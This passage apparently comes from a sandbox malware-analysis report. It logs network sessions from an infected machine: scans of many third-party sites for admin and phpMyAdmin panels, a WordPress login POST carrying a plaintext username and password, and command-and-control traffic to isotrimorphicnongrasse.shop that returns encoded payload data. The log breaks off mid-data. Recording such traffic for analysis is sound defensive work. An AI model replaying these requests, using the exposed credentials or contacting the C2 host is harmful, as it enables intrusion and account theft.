Feb 21, 2024 00:26:24.298768997 CET	344	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:24 GMT Content-Type: text/html Content-Length: 166 Connection: keep-alive Location: https://eyegage.com/admin Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>
Feb 21, 2024 00:26:24.504782915 CET	344	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:24 GMT Content-Type: text/html Content-Length: 166 Connection: keep-alive Location: https://eyegage.com/admin Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
525	192.168.2.6	60632	223.29.45.10	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:24.355417967 CET	185	OUT	GET /admin.php HTTP/1.1 Host: www.shinko-kensetsu.eei.jp Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:24.628782034 CET	453	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:24 GMT Server: Apache Location: https://shinko-kensetsu.eei.jp/admin.php Content-Length: 248 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 68 69 6e 6b 6f 2d 6b 65 6e 73 65 74 73 75 2e 65 65 69 2e 6a 70 2f 61 64 6d 69 6e 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://shinko-kensetsu.eei.jp/admin.php">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
526	192.168.2.6	60822	20.75.101.58	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:24.462764978 CET	165	OUT	GET /admin HTTP/1.1 Host: att.com.sg Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:24.565875053 CET	530	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:24 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 234 Connection: keep-alive Server: Apache/2.4.6 (Red Hat Enterprise Linux) x-frame-options: DENY Cache-Control: no-store Location: http://www.corp.att.com/ap Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 6f 72 70 2e 61 74 74 2e 63 6f 6d 2f 61 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.corp.att.com/ap">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
527	192.168.2.6	60829	3.33.139.32	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:24.501909971 CET	168	OUT	GET /admin HTTP/1.1 Host: protonmail.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:24.648293018 CET	484	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:24 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 60 Connection: keep-alive cache-control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Frame-Options: DENY Content-Security-Policy: script-src 'self' Location: https://protonmail.com/de/ Vary: Accept Data Raw: 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 70 72 6f 74 6f 6e 6d 61 69 6c 2e 63 6f 6d 2f 64 65 2f Data Ascii: Moved Permanently. Redirecting to https://protonmail.com/de/
Feb 21, 2024 00:26:24.859805107 CET	484	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:24 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 60 Connection: keep-alive cache-control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Frame-Options: DENY Content-Security-Policy: script-src 'self' Location: https://protonmail.com/de/ Vary: Accept Data Raw: 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 70 72 6f 74 6f 6e 6d 61 69 6c 2e 63 6f 6d 2f 64 65 2f Data Ascii: Moved Permanently. Redirecting to https://protonmail.com/de/

Session ID	Source IP	Source Port	Destination IP	Destination Port
528	192.168.2.6	60854	223.29.45.22	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:24.810374975 CET	175	OUT	GET /pma/ HTTP/1.1 Host: shinko-kensetsu.co.jp Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:25.081402063 CET	449	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:25 GMT Server: Apache Location: http://www.shinko-kensetsu.eei.jp/pma/ Content-Length: 246 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 68 69 6e 6b 6f 2d 6b 65 6e 73 65 74 73 75 2e 65 65 69 2e 6a 70 2f 70 6d 61 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.shinko-kensetsu.eei.jp/pma/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
529	192.168.2.6	60860	13.232.255.130	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:24.836425066 CET	180	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: amsantechnology.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:25.110358000 CET	415	IN	HTTP/1.1 302 Found Date: Tue, 20 Feb 2024 23:26:24 GMT Server: Apache Location: https://amsantechnology.com/phpMyAdmin/ Content-Length: 223 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6d 73 61 6e 74 65 63 68 6e 6f 6c 6f 67 79 2e 63 6f 6d 2f 70 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://amsantechnology.com/phpMyAdmin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
530	192.168.2.6	60977	217.160.122.119	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:25.228713989 CET	441	OUT	POST /wp-login.php HTTP/1.1 Host: www.netzschnipsel.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://netzschnipsel.de/wp-login.php Content-Length: 141 Content-Type: application/x-www-form-urlencoded Data Raw: 6c 6f 67 3d 6d 6d 6d 2e 70 6f 68 6f 74 6d 61 69 6c 26 70 77 64 3d 73 75 70 70 65 32 32 33 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 41 6e 6d 65 6c 64 65 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 25 33 41 25 32 46 25 32 46 77 77 77 2e 6e 65 74 7a 73 63 68 6e 69 70 73 65 6c 2e 64 65 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31 Data Ascii: log=mmm.pohotmail&pwd=suppe223&rememberme=forever&wp-submit=Anmelden&redirect_to=http%3A%2F%2Fwww.netzschnipsel.de%2Fwp-admin%2F&testcookie=1

Session ID	Source IP	Source Port	Destination IP	Destination Port
531	192.168.2.6	61000	223.29.45.10	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:25.353374004 CET	180	OUT	GET /pma/ HTTP/1.1 Host: www.shinko-kensetsu.eei.jp Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:25.626311064 CET	443	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:25 GMT Server: Apache Location: https://shinko-kensetsu.eei.jp/pma/ Content-Length: 243 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 68 69 6e 6b 6f 2d 6b 65 6e 73 65 74 73 75 2e 65 65 69 2e 6a 70 2f 70 6d 61 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://shinko-kensetsu.eei.jp/pma/">here</a>.</p></body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49708	104.21.33.54	443	3532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:22:36 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: isotrimorphicnongrasse.shop
2024-02-20 23:22:36 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-02-20 23:22:37 UTC	816	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:22:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=d52p2d60d05cd3qtvkickbjhok; expires=Sat, 15-Jun-2024 17:09:16 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=c6jKz9vTaTgmhkwJv3BDQNaHfBoL4PJjNcVkqTwiMH4h%2BNlUYPXC5Kv4aZNXlTmZnbiViY4WmUNJyrhQmY%2Fd%2B4KXOz%2B3yE12YR0QR5pgvzTsBUQWPURy3PI7OaO0wl7BBPgI7Hldmd3NO7EU0Hw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 858a7e1d5d9d332c-EWR alt-svc: h3=":443"; ma=86400
2024-02-20 23:22:37 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-02-20 23:22:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49711	104.21.33.54	443	3532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:22:38 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 52 Host: isotrimorphicnongrasse.shop
2024-02-20 23:22:38 UTC	52	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 41 6d 4e 73 41 32 2d 2d 70 61 6c 26 6a 3d 64 65 66 61 75 6c 74 Data Ascii: act=recive_message&ver=4.0&lid=AmNsA2--pal&j=default
2024-02-20 23:22:38 UTC	814	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:22:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9ueprf72v16en6hb1jsith3joh; expires=Sat, 15-Jun-2024 17:09:17 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JoSneAO40J4IU6cHU2MhTURmzadBBRjOzq%2F2%2BNhdPz0zcNMXcUBqDZkdFYAW30TjUIeF9L%2FKy3xrGfoRnm3CONXHYunsJDyMrDuKJHkAWT0t4DJOIeERg4PbYtw9yurK4XTp7QVpF9HaooxZamY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 858a7e24ab860f59-EWR alt-svc: h3=":443"; ma=86400
2024-02-20 23:22:38 UTC	555	IN	Data Raw: 34 63 31 38 0d 0a 58 46 59 54 58 46 47 61 73 6d 33 2f 6d 68 49 38 41 75 35 75 31 2b 36 6b 4b 73 6b 33 55 6d 57 31 2b 6d 39 41 4f 6a 35 38 7a 51 45 6e 57 78 6c 38 63 62 71 53 54 34 6d 34 4b 42 77 32 77 6d 50 64 7a 6f 51 4b 36 52 55 68 41 4a 66 41 54 7a 52 49 53 78 6e 68 44 46 5a 32 4d 33 78 78 75 4e 4d 4a 33 61 41 79 57 6d 4f 43 48 62 4c 43 71 53 44 70 46 33 4a 46 6c 35 38 58 59 67 41 65 4a 38 41 4c 66 48 59 7a 66 48 47 36 79 57 44 31 75 6a 49 63 49 73 35 4f 39 38 36 47 54 36 63 56 61 45 57 58 6e 77 55 69 57 31 49 65 72 47 6f 7a 4a 6e 38 2f 4f 66 62 56 42 5a 72 35 64 6c 31 75 67 77 75 79 69 38 56 41 70 31 34 2f 44 64 6a 59 51 30 30 77 48 6c 7a 74 49 58 78 32 4d 33 78 7a 2f 38 68 50 78 62 6f 77 63 57 65 61 44 35 71 50 31 30 48 72 4f 6c 68 46 6c 64 70 50 59 Data Ascii: 4c18XFYTXFGasm3/mhI8Au5u1+6kKsk3UmW1+m9AOj58zQEnWxl8cbqST4m4KBw2wmPdzoQK6RUhAJfATzRISxnhDFZ2M3xxuNMJ3aAyWmOCHbLCqSDpF3JFl58XYgAeJ8ALfHYzfHG6yWD1ujIcIs5O986GT6cVaEWXnwUiW1IerGozJn8/OfbVBZr5dl1ugwuyi8VAp14/DdjYQ00wHlztIXx2M3xz/8hPxbowcWeaD5qP10HrOlhFldpPY
2024-02-20 23:22:38 UTC	1369	IN	Data Raw: 56 38 64 70 47 77 39 50 48 6f 73 4d 2b 72 57 41 70 6a 71 64 6c 74 75 68 67 2b 6e 68 73 68 4f 71 46 77 37 44 74 4b 66 43 57 49 57 4d 33 62 74 49 58 78 32 4d 33 78 78 75 70 41 49 68 62 67 6f 48 43 43 74 41 62 36 41 7a 46 2b 72 46 56 39 76 6c 64 70 50 59 42 6f 65 41 65 45 4d 56 6e 59 7a 66 48 47 36 6b 68 62 79 6b 44 49 63 49 73 35 4f 39 38 36 45 43 4b 78 5a 63 46 2b 56 32 41 6b 6a 58 46 30 61 6f 57 30 36 4f 48 63 77 50 76 66 57 42 5a 33 2f 65 6c 5a 6f 6a 51 47 2b 67 38 5a 4e 70 6c 45 32 43 39 61 64 54 57 77 33 4e 46 7a 74 49 58 78 32 4d 33 78 78 75 4e 63 58 33 61 41 79 48 6b 36 4c 44 36 66 4f 38 30 75 6c 57 7a 63 52 6c 2f 64 6c 59 42 6f 65 58 4f 30 68 49 58 6f 65 56 6e 47 36 6b 6b 33 66 75 6d 6b 78 43 4d 35 4f 39 38 36 45 43 75 6b 58 63 41 44 62 32 46 56 67 Data Ascii: V8dpGw9PHosM+rWApjqdltuhg+nhshOqFw7DtKfCWIWM3btIXx2M3xxupAIhbgoHCCtAb6AzF+rFV9vldpPYBoeAeEMVnYzfHG6khbykDIcIs5O986ECKxZcF+V2AkjXF0aoW06OHcwPvfWBZ3/elZojQG+g8ZNplE2C9adTWw3NFztIXx2M3xxuNcX3aAyHk6LD6fO80ulWzcRl/dlYBoeXO0hIXoeVnG6kk3fumkxCM5O986ECukXcADb2FVg
2024-02-20 23:22:38 UTC	1369	IN	Data Raw: 6c 73 4d 7a 67 78 63 46 79 51 6b 6b 33 66 75 6a 49 63 49 73 35 4d 73 70 53 47 45 4f 6b 56 47 67 54 44 6d 77 64 67 62 56 38 51 6f 57 51 6f 64 42 35 57 63 62 71 53 54 64 2b 36 62 78 41 50 35 45 37 33 7a 6f 51 4b 36 55 78 66 62 35 58 61 54 32 41 61 48 6c 7a 74 49 7a 6b 34 4d 57 5a 78 75 4e 30 4f 6c 66 35 69 55 57 32 50 41 72 75 44 77 30 65 6a 56 54 41 4b 30 70 77 47 4b 56 74 52 47 72 31 70 50 6a 78 30 50 7a 6e 79 6b 45 48 79 6b 44 49 63 49 73 35 4f 39 38 36 45 43 4b 78 4e 63 46 2b 56 32 44 77 31 55 78 34 72 72 47 30 77 4d 32 64 2b 58 4a 43 53 54 64 2b 36 4d 68 78 2f 77 6d 50 64 7a 6f 51 4b 36 52 64 79 48 72 6a 77 54 32 41 61 48 6c 7a 74 49 58 78 30 64 6a 4a 7a 6f 4a 4a 50 6b 50 42 31 57 32 2b 4e 42 72 75 4a 7a 45 53 6a 57 7a 4d 56 32 4a 77 4e 4c 6c 42 57 45 Data Ascii: lsMzgxcFyQkk3fujIcIs5MspSGEOkVGgTDmwdgbV8QoWQodB5WcbqSTd+6bxAP5E73zoQK6Uxfb5XaT2AaHlztIzk4MWZxuN0Olf5iUW2PAruDw0ejVTAK0pwGKVtRGr1pPjx0PznykEHykDIcIs5O986ECKxNcF+V2Dw1Ux4rrG0wM2d+XJCSTd+6Mhx/wmPdzoQK6RdyHrjwT2AaHlztIXx0djJzoJJPkPB1W2+NBruJzESjWzMV2JwNLlBWE
2024-02-20 23:22:38 UTC	1369	IN	Data Raw: 32 4d 79 64 63 6b 4a 4a 4e 33 37 6f 79 48 43 4c 4f 54 4c 4b 41 68 68 44 70 46 54 4d 44 31 35 6b 4e 4b 6b 70 63 44 4b 74 67 4f 44 70 34 4d 54 6e 33 30 51 47 58 38 58 64 5a 62 59 6f 44 74 6f 50 48 54 4b 56 55 63 45 6d 34 38 45 39 67 47 68 35 63 37 53 46 38 64 48 59 6d 63 36 43 53 54 37 4c 37 5a 6c 51 67 34 32 54 33 7a 6f 51 4b 36 52 63 76 53 62 6a 77 54 32 41 61 48 6c 7a 74 65 6c 46 63 4d 33 78 78 75 70 4a 4e 33 37 6f 77 57 57 7a 4d 56 50 66 4d 7a 45 53 76 56 6a 77 4f 32 35 55 4d 4a 6c 39 52 47 71 39 6c 4f 44 46 77 4e 54 76 30 33 77 57 52 2f 48 78 58 5a 6f 41 50 74 6f 71 47 42 73 51 39 63 6b 57 56 32 6b 39 67 47 68 35 65 71 48 74 2b 62 44 4e 2b 45 76 58 62 41 35 33 37 59 56 6b 67 34 32 54 33 7a 6f 51 4b 36 52 63 76 53 62 6a 77 54 32 41 61 48 6c 7a 74 65 6c Data Ascii: 2MydckJJN37oyHCLOTLKAhhDpFTMD15kNKkpcDKtgODp4MTn30QGX8XdZbYoDtoPHTKVUcEm48E9gGh5c7SF8dHYmc6CST7L7ZlQg42T3zoQK6RcvSbjwT2AaHlztelFcM3xxupJN37owWWzMVPfMzESvVjwO25UMJl9RGq9lODFwNTv03wWR/HxXZoAPtoqGBsQ9ckWV2k9gGh5eqHt+bDN+EvXbA537YVkg42T3zoQK6RcvSbjwT2AaHlztel
2024-02-20 23:22:38 UTC	1369	IN	Data Raw: 63 65 65 65 59 50 57 36 4d 68 77 69 7a 6b 36 73 34 36 34 4b 36 52 64 79 52 5a 58 61 54 32 4a 66 55 46 37 33 49 58 34 34 65 44 67 31 2f 64 77 4f 6d 2f 42 31 56 6d 53 4e 43 72 4f 50 79 55 79 75 56 44 38 44 32 35 59 48 49 31 6c 51 46 61 42 6f 4f 33 51 2f 55 56 75 36 6b 6b 33 66 75 6a 49 63 49 73 77 4c 72 63 79 65 43 75 74 6b 4d 78 48 41 69 41 46 69 4e 7a 52 63 37 53 46 38 64 6a 4d 68 66 5a 65 34 54 64 2b 36 4d 68 77 69 6c 57 50 64 7a 6f 51 4b 36 52 64 79 52 5a 58 59 43 69 34 59 42 46 7a 76 59 69 77 2b 65 7a 41 32 39 39 55 4d 6b 76 39 39 57 47 79 47 42 62 32 4b 79 55 47 35 56 6a 77 4a 30 4a 59 42 4c 46 56 57 48 61 49 6a 63 46 73 5a 66 48 47 36 6b 6b 33 66 75 6a 49 65 5a 35 52 4d 37 63 36 47 5a 4b 78 59 48 67 7a 62 6e 30 31 4e 4d 42 35 63 37 53 46 38 64 6d 35 Data Ascii: ceeeYPW6Mhwizk6s464K6RdyRZXaT2JfUF73IX44eDg1/dwOm/B1VmSNCrOPyUyuVD8D25YHI1lQFaBoO3Q/UVu6kk3fujIcIswLrcyeCutkMxHAiAFiNzRc7SF8djMhfZe4Td+6MhwilWPdzoQK6RdyRZXYCi4YBFzvYiw+ezA299UMkv99WGyGBb2KyUG5VjwJ0JYBLFVWHaIjcFsZfHG6kk3fujIeZ5RM7c6GZKxYHgzbn01NMB5c7SF8dm5
2024-02-20 23:22:38 UTC	1369	IN	Data Raw: 6b 32 45 6c 78 67 63 49 73 35 4f 39 38 36 45 43 75 74 53 50 45 65 50 32 6b 30 6d 55 6c 77 54 70 57 67 78 4e 33 59 77 4d 2f 58 61 48 5a 58 34 63 46 42 6d 6a 51 43 77 6a 63 70 4c 75 56 6b 32 43 74 47 51 48 32 49 57 4d 33 62 74 49 58 78 32 4d 33 78 78 75 70 41 49 68 62 67 6f 48 43 43 73 42 37 6d 50 79 6b 6d 73 59 44 4d 4a 32 5a 38 62 59 6a 63 30 58 4f 30 68 66 48 59 7a 49 58 32 54 76 32 66 32 75 6a 4a 48 44 2b 52 4f 39 38 36 45 43 75 6b 58 63 6b 66 51 6c 45 31 36 47 68 77 54 6f 32 6b 7a 4d 58 55 32 4e 50 76 52 41 35 6e 31 66 56 70 70 69 41 6d 6e 6e 73 42 47 71 31 6f 2b 43 4e 75 4b 41 79 64 59 55 46 37 68 44 46 5a 32 4d 33 78 78 75 70 4a 4e 33 37 68 33 52 69 44 55 54 76 57 39 30 55 